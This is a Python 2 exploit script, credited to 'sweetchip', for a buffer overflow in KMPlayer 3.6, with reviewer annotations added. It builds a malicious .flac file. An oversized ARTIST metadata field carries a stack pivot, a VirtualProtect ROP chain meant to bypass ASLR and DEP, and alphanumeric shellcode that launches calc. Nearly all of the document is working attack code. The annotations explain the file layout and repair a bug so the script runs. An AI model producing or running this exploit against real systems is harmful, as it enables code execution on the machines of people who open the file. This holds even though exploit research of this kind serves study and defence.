KMPlayer 3.6 exploit

import struct
import sys
import time
from socket import *

# NOTE(review): only struct is referenced anywhere in this listing; sys, time
# and the socket wildcard import look like leftovers.  Kept so the module's
# surface is unchanged.

"""
Kmplayer 3.6 Buffer Overflow exploit
*Very* Low Reliability :I
By sweetchip

Writes a crafted .flac file (name in `filename` below) whose metadata
carries an oversized "ARTIST=" comment.  Per the author's notes further
down, opening it in the vulnerable player is meant to overflow a buffer,
pivot into the ROP chain and run the embedded payload (calc).

NOTE(review): Python 2 only -- print statements, raw_input, and str used as
a byte buffer.  Every gadget address is hard-wired to one build of the
KMPlayer DLLs named in the comments, and the un-annotated 0x7d7xxxxx
values apparently to one specific Windows build, so the reliability
warning above should be taken literally.  Treat the generated file as
malware: only produce and open it inside an isolated test VM.
"""
print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
print "[*] Author : sweetchip | 2013.04.18\n"
print "[*] Public Release Date : 2015.11.12"

# Output path, relative to the current working directory.
filename = "Exploit_bypass_ASLR_DEP.flac"

# Header
# "fLaC" stream marker, a 34-byte STREAMINFO block (header 00 00 00 22), then
# the first byte (0x04) of the following metadata-block header.
# NOTE(review): in the FLAC container a block header is one flag/type byte
# followed by a 3-byte big-endian length; type 4 is VORBIS_COMMENT, which is
# consistent with the "ARTIST=" field built below -- confirm against the spec
# before relying on this reading.
Head1 = ("\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
         "\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
         "\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")
# Written right after the 3-byte block length (`payloadlen`, bottom of file),
# whose fourth byte is 0x00: together these read as a little-endian
# vendor_length of 0 followed by a comment count of 1.
head2 = "\x00\x00\x00\x01\x00\x00\x00"
# Appended after the ARTIST comment.  NOTE(review): reads as a last-block
# PADDING header (0x80 flag | type 1) with length 0xA446 = 42054, which the
# 118000 zero bytes written at the end would cover -- unverified.
EndofHead = ("\x81\x00\xA4\x46")

# cmd = calc
# encoder - x86/alpha_mixed
# 446 bytes.  Opens with 0x54 0x59 (PUSH ESP / POP ECX) and is otherwise
# purely alphanumeric, which is what the "ASCII only" banner refers to.
# NOTE(review): an alpha_mixed decoder presumably locates itself via the
# register loaded by that prologue (ECX <- ESP), so it has to run with ESP
# pointing at/near this buffer -- the ROP chain below is what arranges that.
shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
            "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
            "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
            "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
            "\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
            "\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
            "\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
            "\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
            "\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
            "\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
            "\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
            "\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
            "\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
            "\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
            "\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
            "\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
            "\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
            "\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
            "\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
            "\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
            "\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
            "\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
            "\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
            "\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
            "\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
            "\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
            "\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
            "\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
            "\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
            "\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
            "\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
            "\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")


#############################################################################################################################################
##### ROP
##### special thanks to mona and corelan team
#############################################################################################################################################
# NOTE(review): this has the shape of a mona.py-style VirtualProtect chain.
# It is entered through XCHG EAX,ESP (stack pivot), fetches and adjusts an
# IAT slot into EAX (each RETN 0x04 discards one dword after popping its
# return address -- that is what the "DEAD"/"BEEF"/"SWEE" words and one of
# the INC EAX copies are there to absorb), dereferences it, moves the result
# to ESI, loads the other registers and ends in PUSHAD.  PUSHAD pushes
# EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI, so the following RETN lands on EDI (ROP
# NOP) -> ESI (the resolved function) with EBP (PUSH ESP # RETN) as its return
# address and EBX/EDX/ECX in the dwSize/flNewProtect/lpOldProtect slots.
# Register roles are inferred from the author's per-line notes, not verified,
# and every address is specific to one build of the named DLLs.
rop_gadgets = ""
rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11047e74) # ptr to &VirtualProtect() [IAT bass.dll]  (NOTE(review): adjusted by the ADD/INC gadgets below, so this note may be approximate)
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "DEAD"  # skipped by the preceding RETN 0x04
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "BEEF"  # skipped by the preceding RETN 0x04
rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += "SWEE"  # skipped by the preceding RETN 0x04
rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}  (first copy is skipped by the last RETN 0x04)
rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]
rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]
rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN    ** [bass.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
rop_gadgets += struct.pack('<L',0x00005050) # 0x00005050 -> ebx  (NOTE(review): original note said 0x00000201; reads as dwSize -- confirm)
rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> edx  (PAGE_EXECUTE_READWRITE)
rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x7d782020) # Writable location 7d782020  (NOTE(review): not in a KMPlayer module; presumably OS-build specific)
rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]
rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
rop_gadgets += struct.pack('<L',0x44444444) # inc inc inc inc lol  ("DDDD": INC ESP x4, harmless filler for EAX)
rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN    ** [PProcDLL.dll] **   |  ascii {PAGE_EXECUTE_READ}
#############################################################################################################################################

# Stage 1: 3028 bytes of filler, then the ROP chain, then the payload it
# is meant to make executable.
stage1 = "".join(["C" * 3028, rop_gadgets, shellcode])

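#65536
# trigger a BOF / and will Execute shellcode
#
# Layout of the oversized ARTIST comment, in order: two runs of 'A', a dword,
# 137 more 'A', a POP ESP # RETN gadget and the value it loads, 'B' filler
# sized so that everything from the 4848-byte run to here spans exactly
# 140000 bytes, and finally seven copies of stage1 each padded to a 65536-byte
# slot (the "#65536" note above) so the pivot lands in one of them.
# NOTE(review): 0x7d79192c / 0x7d791930 carry no module annotation, unlike
# the KMPlayer gadgets; like 0x7d782020 in the ROP chain they presumably live
# in an OS module of one specific Windows build -- the likely source of the
# "very low reliability".
artist = "ARTIST="
artist += "A" * 60000
artist += "A" * 4848
artist += struct.pack('<I', 0x7d79192c)
artist += "A" * 137
artist += struct.pack('<I', 0x10402f0f) # POP ESP # RETN    ** [bass_flac.dll] **   |  ascii {PAGE_EXECUTE_READWRITE}
artist += struct.pack('<I', 0x7d791930) # value loaded into ESP (NOTE(review): original note said 7d761930, which does not match the constant)
artist += "B" * (140000 -4848-4-4-4-137)  # = 135003
# Seven 65536-byte slots, each holding stage1 followed by 'Z' padding.
artist += (stage1 + "Z" * (65536 - len(stage1))) * 7
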
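#artist += "C" * 3028
#artist += rop_gadgets
#artist += shellcode
# NOTE(review): the published listing had `sartist += "A" * 100000` here,
# which raises NameError (nothing named sartist exists) and aborts the script
# before any file is written.  Restored as `artist`, consistent with the
# author's `#artist` style for the disabled lines above.  This only appends
# trailing filler, so none of the offsets above move; the comment length
# field and the file size do grow.  If the line was meant to be disabled,
# comment it out instead.
artist += "A" * 100000
# Little-endian length prefix of the ARTIST comment.
artistlength = struct.pack('<I', len(artist))
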
# length
# Packed big-endian after multiplying by 256: the first three bytes are the
# 24-bit length of head2 + EndofHead + the 4-byte prefix + the comment, and the
# fourth byte is 0x00, which head2 then completes into the vendor_length
# field.  struct.error if the length reaches 2**24 (~16 MiB); the sizes
# above stay well under that.  NOTE(review): whether including EndofHead in
# the count is exactly what the target parser expects is not shown here.
payloadlen = struct.pack('>I', len(head2 + EndofHead + artistlength + artist)*256)

# Payload.
# Final file: fLaC + STREAMINFO + header byte, 3-byte length + 0x00, the rest
# of the comment block, the trailing header, then zero padding.
exploit = Head1
exploit += payloadlen
exploit += head2
exploit += artistlength
exploit += artist
exploit += EndofHead
exploit += "\x00" * 118000

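print "\n[*] Generating Flac file....."
print "[ ] Payload size :", (len(exploit))
print "[ ] Shellcode size :", len(shellcode), "\n"

# Write in binary mode: the payload is raw bytes (gadget addresses, header
# and length fields) and text mode on Windows rewrites every 0x0A byte as
# 0x0D 0x0A, silently shifting every offset after it -- the length fields
# alone can easily land on 0x0A.  `with` closes the handle even if the
# write fails.
with open(filename, 'wb') as f:
    f.write(exploit)

print "[*] Malicious File generated Successfully!!!"
print "[ ] file name : " + filename

raw_input("\npress enter to continue :D . . . . .")
#End OF Source.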